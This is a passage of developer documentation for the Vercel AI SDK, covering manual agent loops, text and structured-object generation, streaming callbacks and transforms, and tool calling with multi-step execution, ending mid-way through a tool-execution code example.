For scenarios requiring complete control over the agent loop, you can use AI SDK Core functions (generateText and streamText) to implement your own loop management instead of using stopWhen and prepareStep. This approach provides maximum flexibility for complex workflows.
Implementing a Manual Loop
Build your own agent loop when you need full control over execution:
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
const messages: ModelMessage[] = [{ role: 'user', content: '...' }];
let step = 0;
const maxSteps = 10;
while (step < maxSteps) {
const result = await generateText({
model: __MODEL__,
messages,
tools: {
// your tools here
},
});
messages.push(...result.response.messages);
if (result.text) {
break; // Stop when model generates text
}
step++;
}
This manual approach gives you complete control over:
- Message history management
- Step-by-step decision making
- Custom stopping conditions
- Dynamic tool and model selection
- Error handling and recovery
Learn more about manual agent loops in the cookbook.
title: Agents description: An overview of building agents with the AI SDK.
Agents
The following sections show you how to build agents with the AI SDK - systems where large language models (LLMs) use tools in a loop to accomplish tasks.
<IndexCards cards={[ { title: 'Overview', description: 'Learn what agents are and why to use the Agent class.', href: '/docs/agents/overview', }, { title: 'Building Agents', description: 'Complete guide to creating agents with the Agent class.', href: '/docs/agents/building-agents', }, { title: 'Workflow Patterns', description: 'Structured patterns using core functions for complex workflows.', href: '/docs/agents/workflows', }, { title: 'Loop Control', description: 'Advanced execution control with stopWhen and prepareStep.', href: '/docs/agents/loop-control', }, ]} />
title: Overview description: An overview of AI SDK Core.
AI SDK Core
Large Language Models (LLMs) are advanced programs that can understand, create, and engage with human language on a large scale. They are trained on vast amounts of written material to recognize patterns in language and predict what might come next in a given piece of text.
AI SDK Core simplifies working with LLMs by offering a standardized way of integrating them into your app - so you can focus on building great AI applications for your users, not waste time on technical details.
For example, here’s how you can generate text with various models using the AI SDK:
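Here is a minimal sketch (the provider import and model are placeholders, following the same convention as the other examples in this guide):
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
  model: __MODEL__,
  prompt: 'Why is the sky blue?',
});
console.log(text);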
AI SDK Core Functions
AI SDK Core has various functions designed for text generation, structured data generation, and tool usage. These functions take a standardized approach to setting up prompts and settings, making it easier to work with different models.
- generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
- streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.
- generateObject: Generates a typed, structured object that matches a Zod schema. You can use this function to force the language model to return structured data, e.g. for information extraction, synthetic data generation, or classification tasks.
- streamObject: Stream a structured object that matches a Zod schema. You can use this function to stream generated UIs.
API Reference
Please check out the AI SDK Core API Reference for more details on each function.
title: Generating Text description: Learn how to generate text with the AI SDK.
Generating and Streaming Text
Large language models (LLMs) can generate text in response to a prompt, which can contain instructions and information to process. For example, you can ask a model to come up with a recipe, draft an email, or summarize a document.
The AI SDK Core provides two functions to generate text and stream it from LLMs:
generateText: Generates text for a given prompt and model.streamText: Streams text from a given prompt and model.
Advanced LLM features such as tool calling and structured data generation are built on top of text generation.
generateText
You can generate text using the generateText function. This function is ideal for non-interactive use cases where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
You can use more advanced prompts to generate text with more complex instructions and content:
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
system:
'You are a professional writer. ' +
'You write simple, clear, and concise content.',
prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});
The result object of generateText contains several properties with the generated data and metadata:
- result.content: The content that was generated in the last step.
- result.text: The generated text.
- result.reasoning: The full reasoning that the model has generated in the last step.
- result.reasoningText: The reasoning text of the model (only available for some models).
- result.files: The files that were generated in the last step.
- result.sources: Sources that have been used as references in the last step (only available for some models).
- result.toolCalls: The tool calls that were made in the last step.
- result.toolResults: The results of the tool calls from the last step.
- result.finishReason: The reason the model finished generating text.
- result.usage: The usage of the model during the final step of text generation.
- result.totalUsage: The total usage across all steps (for multi-step generations).
- result.warnings: Warnings from the model provider (e.g. unsupported settings).
- result.request: Additional request information.
- result.response: Additional response information, including response messages and body.
- result.providerMetadata: Additional provider-specific metadata.
- result.steps: Details for all steps, useful for getting information about intermediate steps.
- result.experimental_output: The generated structured output using the experimental_output specification.
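For example, you can read several of these directly off the awaited result (a minimal sketch):
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
  model: __MODEL__,
  prompt: 'Summarize the benefits of unit testing in two sentences.',
});
// plain values on the awaited result, no extra awaiting needed:
console.log(result.text);
console.log(result.finishReason);
console.log(result.usage);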
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateText } from 'ai';
const result = await generateText({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
streamText
Depending on your model and prompt, it can take a large language model (LLM) up to a minute to finish generating its response. This delay can be unacceptable for interactive use cases such as chatbots or real-time applications, where users expect immediate responses.
AI SDK Core provides the streamText function which simplifies streaming text from LLMs:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
});
// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
console.log(textPart);
}
You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC.
The result object contains several helper functions to make the integration into AI SDK UI easier:
- result.toUIMessageStreamResponse(): Creates a UI Message stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
- result.pipeUIMessageStreamToResponse(): Writes UI Message stream delta output to a Node.js response-like object.
- result.toTextStreamResponse(): Creates a simple text stream HTTP response.
- result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.
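For example, a minimal sketch of a Next.js App Router API route that uses one of these helpers (the request shape is an assumption):
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
export async function POST(req: Request) {
  const { prompt } = await req.json();
  const result = streamText({
    model: __MODEL__,
    prompt,
  });
  // stream the response to the client as a UI Message stream:
  return result.toUIMessageStreamResponse();
}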
It also provides several promises that resolve when the stream is finished:
- result.content: The content that was generated in the last step.
- result.text: The generated text.
- result.reasoning: The full reasoning that the model has generated.
- result.reasoningText: The reasoning text of the model (only available for some models).
- result.files: Files that have been generated by the model in the last step.
- result.sources: Sources that have been used as references in the last step (only available for some models).
- result.toolCalls: The tool calls that have been executed in the last step.
- result.toolResults: The tool results that have been generated in the last step.
- result.finishReason: The reason the model finished generating text.
- result.usage: The usage of the model during the final step of text generation.
- result.totalUsage: The total usage across all steps (for multi-step generations).
- result.warnings: Warnings from the model provider (e.g. unsupported settings).
- result.steps: Details for all steps, useful for getting information about intermediate steps.
- result.request: Additional request information from the last step.
- result.response: Additional response information from the last step.
- result.providerMetadata: Additional provider-specific metadata from the last step.
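For example, you can await these promises after kicking off the stream (a minimal sketch, continuing the streamText example above):
// these properties are promises on the streamText result
// and resolve once the stream has finished:
const finalText = await result.text;
const totalUsage = await result.totalUsage;
console.log(finalText, totalUsage);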
onError callback
streamText immediately starts streaming to enable sending data without waiting for the model.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onError({ error }) {
console.error(error); // your error logging logic here
},
});
onChunk callback
When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.
It receives the following chunk types:
- text
- reasoning
- source
- tool-call
- tool-input-start
- tool-input-delta
- tool-result
- raw
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onChunk({ chunk }) {
// implement your own logic here, e.g.:
if (chunk.type === 'text') {
console.log(chunk.text);
}
},
});
onFinish callback
When using streamText, you can provide an onFinish callback that is triggered when the stream is finished (see the API Reference).
It contains the text, usage information, finish reason, messages, steps, total usage, and more:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = streamText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
onFinish({ text, finishReason, usage, response, steps, totalUsage }) {
// your own logic, e.g. for saving the chat history or recording usage
const messages = response.messages; // messages that were generated
},
});
fullStream property
You can read a stream with all events using the fullStream property.
This can be useful if you want to implement your own UI or handle the stream in a different way.
Here is an example of how to use the fullStream property:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
cityAttractions: {
inputSchema: z.object({ city: z.string() }),
execute: async ({ city }) => ({
attractions: ['attraction1', 'attraction2', 'attraction3'],
}),
},
},
prompt: 'What are some San Francisco tourist attractions?',
});
for await (const part of result.fullStream) {
switch (part.type) {
case 'start': {
// handle start of stream
break;
}
case 'start-step': {
// handle start of step
break;
}
case 'text-start': {
// handle text start
break;
}
case 'text-delta': {
// handle text delta here
break;
}
case 'text-end': {
// handle text end
break;
}
case 'reasoning-start': {
// handle reasoning start
break;
}
case 'reasoning-delta': {
// handle reasoning delta here
break;
}
case 'reasoning-end': {
// handle reasoning end
break;
}
case 'source': {
// handle source here
break;
}
case 'file': {
// handle file here
break;
}
case 'tool-call': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool call here
break;
}
}
break;
}
case 'tool-input-start': {
// handle tool input start
break;
}
case 'tool-input-delta': {
// handle tool input delta
break;
}
case 'tool-input-end': {
// handle tool input end
break;
}
case 'tool-result': {
switch (part.toolName) {
case 'cityAttractions': {
// handle tool result here
break;
}
}
break;
}
case 'tool-error': {
// handle tool error
break;
}
case 'finish-step': {
// handle finish step
break;
}
case 'finish': {
// handle finish here
break;
}
case 'error': {
// handle error here
break;
}
case 'raw': {
// handle raw value
break;
}
}
}
Stream transformation
You can use the experimental_transform option to transform the stream.
This is useful for e.g. filtering, changing, or smoothing the text stream.
The transformations are applied before the callbacks are invoked and the promises are resolved.
If you e.g. have a transformation that changes all text to uppercase, the onFinish callback will receive the transformed text.
Smoothing streams
The AI SDK Core provides a smoothStream function that
can be used to smooth out text streaming.
import { smoothStream, streamText } from 'ai';
const result = streamText({
model,
prompt,
experimental_transform: smoothStream(),
});
Custom transformations
You can also implement your own custom transformations. The transformation function receives the tools that are available to the model, and returns a function that is used to transform the stream. Tools can either be generic or limited to the tools that you are using.
Here is an example of how to implement a custom transformation that converts all text to uppercase:
import { TextStreamPart, ToolSet } from 'ai';
const upperCaseTransform =
<TOOLS extends ToolSet>() =>
(options: { tools: TOOLS; stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
transform(chunk, controller) {
controller.enqueue(
// for text chunks, convert the text to uppercase:
chunk.type === 'text'
? { ...chunk, text: chunk.text.toUpperCase() }
: chunk,
);
},
});
You can also stop the stream using the stopStream function.
This is useful, for example, if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.
When you invoke stopStream, it is important to simulate the step-finish and finish events to guarantee that a well-formed stream is returned
and all callbacks are invoked.
const stopWordTransform =
<TOOLS extends ToolSet>() =>
({ stopStream }: { stopStream: () => void }) =>
new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
// note: this is a simplified transformation for testing;
// in a real-world version there would need to be
// stream buffering and scanning to correctly emit prior text
// and to detect all STOP occurrences.
transform(chunk, controller) {
if (chunk.type !== 'text') {
controller.enqueue(chunk);
return;
}
if (chunk.text.includes('STOP')) {
// stop the stream
stopStream();
// simulate the finish-step event
controller.enqueue({
type: 'finish-step',
finishReason: 'stop',
logprobs: undefined,
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
request: {},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
warnings: [],
isContinued: false,
});
// simulate the finish event
controller.enqueue({
type: 'finish',
finishReason: 'stop',
logprobs: undefined,
usage: {
completionTokens: NaN,
promptTokens: NaN,
totalTokens: NaN,
},
response: {
id: 'response-id',
modelId: 'mock-model-id',
timestamp: new Date(0),
},
});
return;
}
controller.enqueue(chunk);
},
});
Multiple transformations
You can also provide multiple transformations. They are applied in the order they are provided.
const result = streamText({
model,
prompt,
experimental_transform: [firstTransform, secondTransform],
});
Sources
Some providers such as Perplexity and Google Generative AI include sources in the response.
Currently sources are limited to web pages that ground the response.
You can access them using the sources property of the result.
Each url source contains the following properties:
- id: The ID of the source.
- url: The URL of the source.
- title: The optional title of the source.
- providerMetadata: Provider metadata for the source.
When you use generateText, you can access the sources using the sources property:
const result = await generateText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for (const source of result.sources) {
if (source.sourceType === 'url') {
console.log('ID:', source.id);
console.log('Title:', source.title);
console.log('URL:', source.url);
console.log('Provider metadata:', source.providerMetadata);
console.log();
}
}
When you use streamText, you can access the sources using the fullStream property:
const result = streamText({
model: 'google/gemini-2.5-flash',
tools: {
google_search: google.tools.googleSearch({}),
},
prompt: 'List the top 5 San Francisco news from the past week.',
});
for await (const part of result.fullStream) {
if (part.type === 'source' && part.sourceType === 'url') {
console.log('ID:', part.id);
console.log('Title:', part.title);
console.log('URL:', part.url);
console.log('Provider metadata:', part.providerMetadata);
console.log();
}
}
The sources are also available in the result.sources promise.
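For example, once the stream above has finished, you can read the resolved sources directly (a minimal sketch):
const sources = await result.sources;
for (const source of sources) {
  if (source.sourceType === 'url') {
    console.log(source.url);
  }
}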
Examples
You can see generateText and streamText in action using various frameworks in the following examples:
generateText
<ExampleLinks examples={[ { title: 'Learn to generate text in Node.js', link: '/examples/node/generating-text/generate-text', }, { title: 'Learn to generate text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-text', }, { title: 'Learn to generate text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-text', }, ]} />
streamText
<ExampleLinks examples={[ { title: 'Learn to stream text in Node.js', link: '/examples/node/generating-text/stream-text', }, { title: 'Learn to stream text in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-text-generation', }, { title: 'Learn to stream text in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-text-generation', }, ]} />
title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.
Generating Structured Data
While text generation can be useful, your use case will likely call for generating structured data. For example, you might want to extract information from text, classify data, or generate synthetic data.
Many language models are capable of generating structured data, often through provider features described as "JSON modes" or "tools". However, you need to manually provide schemas and then validate the generated data, as LLMs can produce incorrect or incomplete structured data.
The AI SDK standardizes structured object generation across model providers
with the generateObject
and streamObject functions.
You can use both functions with different output strategies, e.g. array, object, enum, or no-schema,
and with different generation modes, e.g. auto, tool, or json.
You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want,
and the AI model will generate data that conforms to that structure.
Generate Object
The generateObject function generates structured data from a prompt.
The schema is also used to validate the generated data, ensuring type safety and correctness.
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { object } = await generateObject({
model: __MODEL__,
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
Accessing response headers & body
Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.
You can access the raw response headers and body using the response property:
import { generateObject } from 'ai';
const result = await generateObject({
// ...
});
console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));
Stream Object
Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case.
With the streamObject function, you can stream the model's response as it is generated.
import { streamObject } from 'ai';
const { partialObjectStream } = streamObject({
// ...
});
// use partialObjectStream as an async iterable
for await (const partialObject of partialObjectStream) {
console.log(partialObject);
}
You can use streamObject to stream generated UIs in combination with React Server Components (see Generative UI) or the useObject hook.
See streamObject in action with these examples.
onError callback
streamObject immediately starts streaming.
Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.
To log errors, you can provide an onError callback that is triggered when an error occurs.
import { streamObject } from 'ai';
const result = streamObject({
// ...
onError({ error }) {
console.error(error); // your error logging logic here
},
});
Output Strategy
You can use both functions with different output strategies, e.g. array, object, enum, or no-schema.
Object
The default output strategy is object, which returns the generated data as an object.
You don't need to specify the output strategy if you want to use the default.
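A minimal sketch that passes output: 'object' explicitly (equivalent to omitting it):
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { object } = await generateObject({
  model: __MODEL__,
  output: 'object', // the default strategy; can be omitted
  schema: z.object({
    title: z.string(),
    summary: z.string(),
  }),
  prompt: 'Summarize the plot of Hamlet.',
});
console.log(object.title);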
Array
If you want to generate an array of objects, you can set the output strategy to array.
When you use the array output strategy, the schema specifies the shape of an array element.
With streamObject, you can also stream the generated array elements using elementStream.
import { streamObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { elementStream } = streamObject({
model: __MODEL__,
output: 'array',
schema: z.object({
name: z.string(),
class: z
.string()
.describe('Character class, e.g. warrior, mage, or thief.'),
description: z.string(),
}),
prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});
for await (const hero of elementStream) {
console.log(hero);
}
Enum
If you want to generate a specific enum value, e.g. for classification tasks,
you can set the output strategy to enum
and provide a list of possible values in the enum parameter.
Enum output is only available with generateObject.
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
const { object } = await generateObject({
model: __MODEL__,
output: 'enum',
enum: ['action', 'comedy', 'drama', 'horror', 'sci-fi'],
prompt:
'Classify the genre of this movie plot: ' +
'"A group of astronauts travel through a wormhole in search of a ' +
'new habitable planet for humanity."',
});
No Schema
In some cases, you might not want to use a schema,
for example when the data is a dynamic user request.
You can use the output setting to set the output format to no-schema in those cases
and omit the schema parameter.
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
const { object } = await generateObject({
model: __MODEL__,
output: 'no-schema',
prompt: 'Generate a lasagna recipe.',
});
Schema Name and Description
You can optionally specify a name and description for the schema. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.
import { generateObject } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const { object } = await generateObject({
model: __MODEL__,
schemaName: 'Recipe',
schemaDescription: 'A recipe for a dish.',
schema: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
prompt: 'Generate a lasagna recipe.',
});
Accessing Reasoning
You can access the reasoning used by the language model to generate the object via the reasoning property on the result. This property contains a string with the model's thought process, if available.
import { OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: 'openai/gpt-5',
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
providerOptions: {
openai: {
strictJsonSchema: true,
reasoningSummary: 'detailed',
} satisfies OpenAIResponsesProviderOptions,
},
});
console.log(result.reasoning);
Error Handling
When generateObject cannot generate a valid object, it throws an AI_NoObjectGeneratedError.
This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:
- The model failed to generate a response.
- The model generated a response that could not be parsed.
- The model generated a response that could not be validated against the schema.
The error preserves the following information to help you log the issue:
- text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
- response: Metadata about the language model response, including response id, timestamp, and model.
- usage: Request token usage.
- cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.
import { generateObject, NoObjectGeneratedError } from 'ai';
try {
await generateObject({ model, schema, prompt });
} catch (error) {
if (NoObjectGeneratedError.isInstance(error)) {
console.log('NoObjectGeneratedError');
console.log('Cause:', error.cause);
console.log('Text:', error.text);
console.log('Response:', error.response);
console.log('Usage:', error.usage);
}
}
Repairing Invalid or Malformed JSON
Sometimes the model will generate invalid or malformed JSON.
You can use the repairText function to attempt to repair the JSON.
It receives the error, either a JSONParseError or a TypeValidationError,
and the text that was generated by the model.
You can then attempt to repair the text and return the repaired text.
import { generateObject } from 'ai';
const { object } = await generateObject({
model,
schema,
prompt,
experimental_repairText: async ({ text, error }) => {
// example: add a closing brace to the text
return text + '}';
},
});
Structured outputs with generateText and streamText
You can generate structured data with generateText and streamText by using the experimental_output setting.
generateText
import { generateText, Output } from 'ai';
import { z } from 'zod';
// experimental_output is a structured object that matches the schema:
const { experimental_output } = await generateText({
// ...
experimental_output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable().describe('Age of the person.'),
contact: z.object({
type: z.literal('email'),
value: z.string(),
}),
occupation: z.object({
type: z.literal('employed'),
company: z.string(),
position: z.string(),
}),
}),
}),
prompt: 'Generate an example person for testing.',
});
streamText
import { streamText, Output } from 'ai';
import { z } from 'zod';
// experimental_partialOutputStream contains generated partial objects:
const { experimental_partialOutputStream } = streamText({
// ...
experimental_output: Output.object({
schema: z.object({
name: z.string(),
age: z.number().nullable().describe('Age of the person.'),
contact: z.object({
type: z.literal('email'),
value: z.string(),
}),
occupation: z.object({
type: z.literal('employed'),
company: z.string(),
position: z.string(),
}),
}),
}),
prompt: 'Generate an example person for testing.',
});
More Examples
You can see generateObject and streamObject in action using various frameworks in the following examples:
generateObject
<ExampleLinks examples={[ { title: 'Learn to generate objects in Node.js', link: '/examples/node/generating-structured-data/generate-object', }, { title: 'Learn to generate objects in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/generating-object', }, { title: 'Learn to generate objects in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/generating-object', }, ]} />
streamObject
<ExampleLinks examples={[ { title: 'Learn to stream objects in Node.js', link: '/examples/node/streaming-structured-data/stream-object', }, { title: 'Learn to stream objects in Next.js with Route Handlers (AI SDK UI)', link: '/examples/next-pages/basics/streaming-object-generation', }, { title: 'Learn to stream objects in Next.js with Server Actions (AI SDK RSC)', link: '/examples/next-app/basics/streaming-object-generation', }, ]} />
title: Tool Calling description: Learn about tool calling and multi-step calls (using stopWhen) with AI SDK Core.
Tool Calling
As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain three elements:
- description: An optional description of the tool that can influence when the tool is picked.
- inputSchema: A Zod schema or a JSON schema that defines the input parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
- execute: An optional async function that is called with the inputs from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.
The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
prompt: 'What is the weather in San Francisco?',
});
Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).
Multi-Step Calls (using stopWhen)
With the stopWhen setting, you can enable multi-step calls in generateText and streamText. When stopWhen is set and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there are no further tool calls or the stopping condition is met.
By default, when you use generateText or streamText, it triggers a single generation. This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response or generate a tool call. If the model generates a tool call, its generation is complete and that step is finished.
You may want the model to generate text after the tool has been executed, for example to summarize the tool results in the context of the user's query. In many cases, you may also want the model to use multiple tools in a single response. This is where multi-step calls come in.
You can think of multi-step calls in a similar way to a conversation with a human. When you ask a question, if the person does not already have the requisite knowledge (the equivalent of a model's training data), they may need to look up information (use a tool) before they can provide you with an answer. In the same way, the model may need to call a tool to get the information it needs to answer your question, where each generation (tool call or text generation) is a step.
Example
In the following example, there are two steps:
- Step 1
- The prompt
'What is the weather in San Francisco?'is sent to the model. - The model generates a tool call.
- The tool call is executed.
- The prompt
- Step 2
- The tool result is sent to the model.
- The model generates a response considering the tool result.
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const { text, steps } = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // stop after a maximum of 5 steps if tools were called
prompt: 'What is the weather in San Francisco?',
});
You can use streamText in a similar way.
Steps
To access intermediate tool calls and results, you can use the steps property in the result object
or the streamText onFinish callback.
It contains all the text, tool calls, tool results, and more from each step.
Example: Extract tool results from all steps
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { steps } = await generateText({
model: __MODEL__,
stopWhen: stepCountIs(10),
// ...
});
// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);
onStepFinish callback
When using generateText or streamText, you can provide an onStepFinish callback that
is triggered when a step is finished,
i.e. all text deltas, tool calls, and tool results for the step are available.
When you have multiple steps, the callback is triggered for each step.
import { generateText } from 'ai';
const result = await generateText({
// ...
onStepFinish({ text, toolCalls, toolResults, finishReason, usage }) {
// your own logic, e.g. for saving the chat history or recording usage
},
});
prepareStep callback
The prepareStep callback is called before a step is started.
It is called with the following parameters:
- model: The model that was passed into generateText.
- stopWhen: The stopping condition that was passed into generateText.
- stepNumber: The number of the step that is being executed.
- steps: The steps that have been executed so far.
- messages: The messages that will be sent to the model for the current step.
You can use it to provide different settings for a step, including modifying the input messages.
import { generateText } from 'ai';
const result = await generateText({
// ...
prepareStep: async ({ model, stepNumber, steps, messages }) => {
if (stepNumber === 0) {
return {
// use a different model for this step:
model: modelForThisParticularStep,
// force a tool choice for this step:
toolChoice: { type: 'tool', toolName: 'tool1' },
// limit the tools that are available for this step:
activeTools: ['tool1'],
};
}
// when nothing is returned, the default settings are used
},
});
Message Modification for Longer Agentic Loops
In longer agentic loops, you can use the messages parameter to modify the input messages for each step. This is particularly useful for prompt compression:
prepareStep: async ({ stepNumber, steps, messages }) => {
// Compress conversation history for longer loops
if (messages.length > 20) {
return {
messages: messages.slice(-10),
};
}
return {};
},
Response Messages
Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.
Both generateText and streamText have a response.messages property that you can use to
add the assistant and tool messages to your conversation history.
It is also available in the onFinish callback of streamText.
The response.messages property contains an array of ModelMessage objects that you can add to your conversation history:
import { generateText, ModelMessage } from 'ai';
const messages: ModelMessage[] = [
// ...
];
const { response } = await generateText({
// ...
messages,
});
// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)
Dynamic Tools
AI SDK Core supports dynamic tools for scenarios where tool schemas are not known at compile time. This is useful for:
- MCP (Model Context Protocol) tools without schemas
- User-defined functions at runtime
- Tools loaded from external sources
Using dynamicTool
The dynamicTool helper creates tools with unknown input/output types:
import { dynamicTool } from 'ai';
import { z } from 'zod';
const customTool = dynamicTool({
description: 'Execute a custom function',
inputSchema: z.object({}),
execute: async input => {
// input is typed as 'unknown'
// You need to validate/cast it at runtime
const { action, parameters } = input as any;
// Execute your dynamic logic
return { result: `Executed ${action}` };
},
});
Type-Safe Handling
When using both static and dynamic tools, use the dynamic flag for type narrowing:
const result = await generateText({
model: __MODEL__,
tools: {
// Static tool with known types
weather: weatherTool,
// Dynamic tool
custom: dynamicTool({
/* ... */
}),
},
onStepFinish: ({ toolCalls, toolResults }) => {
// Type-safe iteration
for (const toolCall of toolCalls) {
if (toolCall.dynamic) {
// Dynamic tool: input is 'unknown'
console.log('Dynamic:', toolCall.toolName, toolCall.input);
continue;
}
// Static tool: full type inference
switch (toolCall.toolName) {
case 'weather':
console.log(toolCall.input.location); // typed as string
break;
}
}
},
});
Preliminary Tool Results
You can return an AsyncIterable over multiple results.
In this case, the last value from the iterable is the final tool result.
This can be used in combination with generator functions to e.g. stream status information during the tool execution:
tool({
description: 'Get the current weather.',
inputSchema: z.object({
location: z.string(),
}),
async *execute({ location }) {
yield {
status: 'loading' as const,
text: `Getting weather for ${location}`,
weather: undefined,
};
await new Promise(resolve => setTimeout(resolve, 3000));
const temperature = 72 + Math.floor(Math.random() * 21) - 10;
yield {
status: 'success' as const,
text: `The weather in ${location} is ${temperature}°F`,
temperature,
};
},
});
Tool Choice
You can use the toolChoice setting to influence when a tool is selected.
It supports the following settings:
- auto (default): the model can choose whether and which tools to call.
- required: the model must call a tool. It can choose which tool to call.
- none: the model must not call tools.
- { type: 'tool', toolName: string (typed) }: the model must call the specified tool.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
toolChoice: 'required', // force the model to call a tool
prompt: 'What is the weather in San Francisco?',
});
Tool Execution Options
When tools are called, they receive additional options as a second parameter.
Tool Call ID
The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.
import {
streamText,
tool,
createUIMessageStream,
createUIMessageStreamResponse,
} from 'ai';
export async function POST(req: Request) {
const { messages } = await req.json();
const stream = createUIMessageStream({
execute: ({ writer }) => {
const result = streamText({
// ...
messages,
tools: {
myTool: tool({
// ...
execute: async (args, { toolCallId }) => {
// return e.g. custom status for tool call
writer.write({
